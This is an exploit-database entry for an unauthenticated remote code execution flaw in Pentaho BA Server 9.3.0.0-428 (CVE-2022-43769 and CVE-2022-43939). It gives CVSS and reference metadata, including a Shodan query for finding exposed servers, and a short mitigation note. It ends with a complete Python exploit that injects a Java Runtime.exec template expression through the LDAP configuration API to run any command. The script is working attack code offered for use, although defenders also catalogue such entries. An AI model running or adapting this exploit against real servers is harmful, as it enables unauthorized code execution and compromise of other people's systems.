Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)

vendor:

Pentaho BA Server

by:

dwbzn

9.8

CVSS

CRITICAL

Remote Code Execution (RCE)

CWE

Product Name: Pentaho BA Server

Affected Version From: 9.3.0.0-428

Affected Version To: 9.3.0.0-428

Patch Exists: YES

Related CWE: CVE-2022-43769, CVE-2022-43939

CPE: a:hitachivantara:pentaho_ba_server:9.3.0.0-428

Metasploit: https://www.rapid7.com/db/modules/exploit/multi/http/pentaho_business_server_authbypass_and_ssti/, https://www.rapid7.com/db/modules/exploit/multi/http/pentaho_business_server_authbypass_and_ssti/

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=90998

Tags: packetstorm,cve,cve2022,rce,ssti,pentaho,kev

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-, https://nvd.nist.gov/vuln/detail/CVE-2022-43769, http://packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.html

Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.favicon.hash:1749354953', 'verified': True, 'vendor': 'hitachi', 'product': 'vantara_pentaho_business_analytics_server'}

Platforms Tested: Windows 11

2022

Pentaho BA Server EE 9.3.0.0-428 – Remote Code Execution (RCE) (Unauthenticated)

This exploit allows an unauthenticated attacker to execute arbitrary code on the vulnerable system by exploiting two CVEs, CVE-2022-43769 and CVE-2022-43939. The exploit works by sending a specially crafted request to the server which contains a command to be executed. The command is sent via a URL parameter and is executed using the Java Runtime.getRuntime().exec() method.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all systems are running the latest version of the software. Additionally, it is recommended to restrict access to the vulnerable system to only trusted users.

Source

Exploit-DB raw data:

# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
# Author: dwbzn
# Date: 2022-04-04
# Vendor: https://www.hitachivantara.com/
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html
# Version: Pentaho BA Server 9.3.0.0-428
# CVE: CVE-2022-43769, CVE-2022-43939
# Tested on: Windows 11
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).

# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)
import requests
import argparse

parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')
parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)
args = parser.parse_args()

url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"

print ("running...")
r = requests.get(url)
if r.text == 'false':
    print ("command should've executed! nice.")
else:
    print ("didn't work. sadge...")